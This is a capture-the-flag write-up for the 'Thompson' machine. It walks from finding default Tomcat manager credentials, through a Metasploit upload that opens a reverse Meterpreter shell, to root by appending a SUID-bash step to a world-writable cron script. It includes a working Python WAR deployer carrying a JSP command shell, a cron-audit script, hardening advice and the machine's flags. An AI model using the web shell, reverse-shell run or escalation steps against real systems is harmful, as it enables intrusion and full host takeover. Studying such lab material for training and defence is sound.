Thompson
Boot2root machine for the FIT and BSides Guatemala CTF.
Initial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~/Documents]
└─$ sudo nmap -sV -sC -v thompson.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-title: Apache Tomcat/8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The Nmap scan shows SSH on port 22, with an OpenSSH version string that points to Ubuntu. Port 8009 runs AJP13 (Apache JServ Protocol v1.3), the binary protocol normally used to put an Apache HTTP Server front end in front of Tomcat. Finally, port 8080 runs Apache Tomcat 8.5.5.
SSH 22

The SSH service on this host accepts password authentication.
HTTP 8080
Since the web server is Apache Tomcat 8.5.5, we run a dedicated Tomcat scanner against it.
┌──(env)(kali㉿kali)-[~/Tools/ApacheTomcatScanner]
└─$ py ApacheTomcatScanner.py -tu http://thompson.thm:8080 -v -C
Apache Tomcat Scanner v3.7 - by Remi GASCOU (Podalirius)
[verbose] 10 credentials will be tested per target
[+] Targeting 1 urls.
[+] Searching for Apache Tomcats servers on specified targets ...
[2025/08/19 17h51m54s] Status (0/1) 0.00 % | Rate 0 tests/s [>] [Apache Tomcat/8.5.5] on thompson.thm:8080 (manager: accessible) on http://thompson.thm:8080/manager/html
| Valid user: tomcat | password: s3cret | Default account in configuration, with roles="tomcat"
| CVEs: CVE-2017-5651, CVE-2016-8735, CVE-2017-12617, CVE-2016-6816, CVE-2017-5648, CVE-2017-5650, CVE-2017-5664, CVE-2017-7675, CVE-2017-5647, CVE-2016-6817, CVE-2016-8745, CVE-2017-7674, CVE-2020-13943, CVE-2022-25762, CVE-2022-42252
[+] All done!
The scanner reports a valid default credential pair, tomcat:s3cret, and that the Manager application is reachable at /manager/html.
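The scanner's note "Default account in configuration" refers to the example users that ship in Tomcat's conf/tomcat-users.xml. We never read the box's own file, so the fragment below is an added illustration rather than its contents: the shape of an account like the one found, next to a hardened equivalent. The username deploy-ci, the manager-script role choice and the placeholder password are assumptions.

```xml
<!-- Weak: stock example user, short guessable password, and the GUI role
     on an account that anyone can find in the default config -->
<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>

<!-- Hardened (assumed names): dedicated account, long random secret, and
     only the role a deployment pipeline actually needs -->
<tomcat-users>
  <role rolename="manager-script"/>
  <user username="deploy-ci" password="REPLACE-WITH-A-LONG-RANDOM-SECRET"
        roles="manager-script"/>
</tomcat-users>
```

Pair this with a source-address restriction (a RemoteAddrValve in the manager application's META-INF/context.xml) or remove the manager webapp entirely where nobody deploys through it; a credential that is not reachable from the network cannot be guessed or replayed.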
Meterpreter Shell as tomcat
A searchsploit query shows that the Apache Tomcat Manager application gives authenticated remote code execution (RCE): anyone who can log in with manager rights can upload and deploy a WAR file, and the deployed application runs whatever code it contains as the Tomcat user. This is less a bug than the Manager's intended deployment feature, which is why the default credentials found above are exactly what makes it exploitable.
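What the Metasploit module automates can also be done by hand against the Manager's text interface. The following is an added example, not code from the writeup or from Metasploit. It assumes the target http://thompson.thm:8080 and the credentials tomcat:s3cret found above, and that the account carries the manager-script role, which the /manager/text endpoints require (the HTML interface the scanner probed needs manager-gui). The JSP payload and the context path /sysinfo are constructed for this example.

```python
"""Manual WAR deployment through the Tomcat Manager text interface.

Added example; not the writeup's own steps and not Metasploit code.
Assumed: base URL http://thompson.thm:8080, credentials tomcat:s3cret,
and the manager-script role on that account (required by /manager/text/*).
"""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

BASE = "http://thompson.thm:8080"          # assumption: target from the scan above
USER, PASSWORD = "tomcat", "s3cret"        # credentials reported by the scanner
CONTEXT = "/sysinfo"                       # constructed context path for the example

# Constructed JSP payload: runs the "cmd" query parameter with /bin/sh and
# returns its stdout. Deliberately minimal; no encoding or error handling.
JSP_SHELL = r"""<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""


def build_war(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """Return a WAR (a zip) holding only the JSP; a JSP-only app needs no web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> dict:
    """Map of entry name -> text content, used to sanity-check a built archive."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return {name: war.read(name).decode() for name in war.namelist()}


def basic_auth_header(user: str, password: str) -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def deploy_url(base: str, context: str) -> str:
    """Text interface: PUT the WAR as the body to /manager/text/deploy?path=<context>."""
    return f"{base}/manager/text/deploy?path={urllib.parse.quote(context)}&update=true"


def undeploy_url(base: str, context: str) -> str:
    return f"{base}/manager/text/undeploy?path={urllib.parse.quote(context)}"


def shell_url(base: str, context: str, cmd: str) -> str:
    """URL that makes the deployed JSP run one command (no manager auth needed)."""
    return f"{base}{context}/index.jsp?cmd={urllib.parse.quote(cmd)}"


def manager_request(url: str, method: str = "GET", body: bytes = None) -> str:
    req = urllib.request.Request(url, data=body, method=method)
    req.add_header("Authorization", basic_auth_header(USER, PASSWORD))
    if body is not None:
        req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Deploy, run one command, then undeploy so the payload does not linger.
    print(manager_request(deploy_url(BASE, CONTEXT), "PUT", build_war(JSP_SHELL)))
    with urllib.request.urlopen(shell_url(BASE, CONTEXT, "id"), timeout=15) as r:
        print(r.read().decode(errors="replace"))
    print(manager_request(undeploy_url(BASE, CONTEXT)))
```

Tomcat answers a successful deploy with a line starting "OK - Deployed application at context path". A useful check before trying this is a GET to /manager/text/list with the same credentials: a 403 means the account has manager-gui but not manager-script, in which case you need the HTML form with its CSRF token instead, which is the route the Metasploit module takes in the run below.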
┌──(kali㉿kali)-[~]
└─$ searchsploit apache tomcat authen
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache Tomcat - Form Authentication 'Username' Enumeration | multiple/remote/9995.txt
Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration | multiple/remote/33023.txt
Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) | multiple/remote/16317.rb
Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit) | multiple/remote/31433.rb
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Next we use Metasploit, since this technique is already packaged as a module there.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > search exploit apache tomcat manager upload
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
1 \_ target: Automatic . . . .
2 \_ target: Java Universal . . . .
3 \_ target: Windows Universal . . . .
4 \_ target: Linux x86 . . . .
5 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
6 \_ target: Java Universal . . . .
7 \_ target: Windows Universal . . . .
8 \_ target: Linux x86 . . . .
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/tomcat_mgr_upload
After interacting with a module you can manually set a TARGET with set TARGET 'Linux x86'
msf6 auxiliary(scanner/http/tomcat_mgr_login) > use 5
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
After setting the required options and running the exploit, we get a session on the target as the tomcat user.
msf6 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h
, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.23 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts thompson.thm
rhosts => thompson.thm
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost tun0
lhost => 10.17.21.52
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.17.21.52:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying q2ppksw...
[*] Executing q2ppksw...
[*] Sending stage (58073 bytes) to 10.201.29.231
[*] Undeploying q2ppksw ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.17.21.52:4444 -> 10.201.29.231:38520) at 2025-08-19 18:25:15 +0700
meterpreter > getuid
Server username: tomcat
user.txt
tomcat@ubuntu:/$ cd home
cd home
tomcat@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Aug 14 2019 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 jack
tomcat@ubuntu:/home$ cd jack
cd jack
tomcat@ubuntu:/home/jack$ ls -la
ls -la
total 48
drwxr-xr-x 4 jack jack 4096 Aug 23 2019 .
drwxr-xr-x 3 root root 4096 Aug 14 2019 ..
-rw------- 1 root root 1476 Aug 14 2019 .bash_history
-rw-r--r-- 1 jack jack 220 Aug 14 2019 .bash_logout
-rw-r--r-- 1 jack jack 3771 Aug 14 2019 .bashrc
drwx------ 2 jack jack 4096 Aug 14 2019 .cache
-rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
drwxrwxr-x 2 jack jack 4096 Aug 14 2019 .nano
-rw-r--r-- 1 jack jack 655 Aug 14 2019 .profile
-rw-r--r-- 1 jack jack 0 Aug 14 2019 .sudo_as_admin_successful
-rw-r--r-- 1 root root 39 Aug 19 04:26 test.txt
-rw-rw-r-- 1 jack jack 33 Aug 14 2019 user.txt
-rw-r--r-- 1 root root 183 Aug 14 2019 .wget-hsts
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
In jack's home directory we find not only user.txt but also a bash script, id.sh, and a text file, test.txt.
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
test.txt holds the output of id, and that output shows uid=0(root); the file is owned by root and the only thing that writes it is id.sh, so id.sh is being executed as root.
The obvious guess is a cron job.
tomcat@ubuntu:/home/jack$ cat /etc/crontab
cat /etc/crontab
## /etc/crontab: system-wide crontab
## Unlike any other crontab you don't have to run the `crontab'
## command to install the new version when you edit this file
## and files in /etc/cron.d. These files also have username fields,
## that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
## m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
#
Since id.sh is world-writable (-rwxrwxrwx in the listing above) and this job runs it as root every minute, any command we append to the script will be executed as root.
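A quick way to spot this pattern on any box, as an added example that is not part of the writeup: parse the system crontab format (five time fields, a user, then the command), resolve the script each root job runs, and check whether the current user can write to it or to its directory. The constant SAMPLE_CRONTAB is a copy of the crontab shown above, embedded so the code runs offline; when executed directly it reads /etc/crontab and /etc/cron.d instead.

```python
"""Find root cron jobs whose script the current user can tamper with.

Added example, not part of the original writeup. Limitations are
deliberate: only jobs whose target is an explicit path, or a script given
to an interpreter relative to a leading "cd DIR &&", are resolved. Bare
command names (run-parts, test) are looked up in PATH by cron and are a
different check (PATH hijacking), so they resolve to None here.
"""
import glob
import os
import re
import shlex

INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}

# Constructed copy of the crontab seen on the box, so the script runs offline.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
#
"""

_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
_CD_PREFIX = re.compile(r"^cd\s+(\S+)\s*&&\s*(.*)$")


def parse_system_crontab(text):
    """Yield (user, command) for every job line in /etc/crontab or an /etc/cron.d file."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ASSIGNMENT.match(line):
            continue
        parts = line.split(None, 6)          # m h dom mon dow user command
        if len(parts) == 7:
            yield parts[5], parts[6]


def script_path(command):
    """Absolute path of the script a job executes, or None if it cannot be resolved."""
    cwd = "/"
    m = _CD_PREFIX.match(command)
    if m:
        cwd, command = m.group(1), m.group(2)
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        # first non-option argument is the script, relative to the cd target
        target = next((a for a in argv[1:] if not a.startswith("-")), None)
        if target is None:
            return None
    elif "/" in argv[0]:
        target = argv[0]
    else:
        return None                          # bare command name: PATH lookup, not a script file
    return os.path.normpath(os.path.join(cwd, target))


def writable_root_jobs(crontab_text, access=os.access):
    """Return (path, reason, command) for root jobs the caller can influence.

    `access` is injectable so the logic can be exercised without touching disk.
    """
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = script_path(command)
        if path is None:
            continue
        if access(path, os.W_OK):
            findings.append((path, "script is writable", command))
        elif access(os.path.dirname(path), os.W_OK):
            findings.append((path, "parent directory is writable", command))
    return findings


if __name__ == "__main__":
    for f in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(f) as fh:
                text = fh.read()
        except OSError:
            continue
        for path, reason, command in writable_root_jobs(text):
            print(f"{f}: {path} ({reason}): {command}")
```

The parent-directory case matters as much as the file itself: if the directory is writable but the script is not, the file can still be replaced by renaming it away and creating a new one, so both are reported.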
Shell as root
We copy /bin/bash and set the SUID bit on the copy so that any user can run it as root. Two caveats: bash drops an effective UID that differs from the real UID at startup unless it is started with -p, so the copy must be run as ./shell -p; and if /tmp were mounted noexec the copy would have to go somewhere else.
tomcat@ubuntu:/home/jack$ echo "cp /bin/bash /tmp/shell; chmod u+s /tmp/shell" >> id.sh
echo "cp /bin/bash /tmp/shell; chmod u+s /tmp/shell" >> id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
cp /bin/bash /tmp/shell; chmod u+s /tmp/shell
tomcat@ubuntu:/home/jack$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ ls -la
ls -la
total 1056
drwxrwxrwt 10 root root 4096 Aug 19 04:30 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .font-unix
drwxr-x--- 2 tomcat tomcat 4096 Aug 19 04:25 hsperfdata_tomcat
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .ICE-unix
-rwsr-xr-x 1 root root 1037528 Aug 19 04:30 shell
drwx------ 3 root root 4096 Aug 19 03:07 systemd-private-790db77e1b13456eb630b88cb7833710-systemd-timesyncd.service-EzOcPX
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .Test-unix
drwxrwxrwt 2 root root 4096 Aug 19 03:07 VMwareDnD
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .X11-unix
drwxrwxrwt 2 root root 4096 Aug 19 03:07 .XIM-unix
tomcat@ubuntu:/tmp$ ./shell -p
./shell -p
shell-4.3# id
id
uid=1001(tomcat) gid=1001(tomcat) euid=0(root) groups=1001(tomcat)
The real UID is still tomcat, but the effective UID is root, which is all we need to read /root.
root.txt
shell-4.3# cd /root
cd /root
shell-4.3# ls -la
ls -la
total 24
drwx------ 3 root root 4096 Aug 14 2019 .
drwxr-xr-x 22 root root 4096 Aug 14 2019 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Aug 14 2019 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Aug 14 2019 root.txt
shell-4.3# cat root.txt
cat root.txt
d89d5391984c0450a95497153ae7ca3a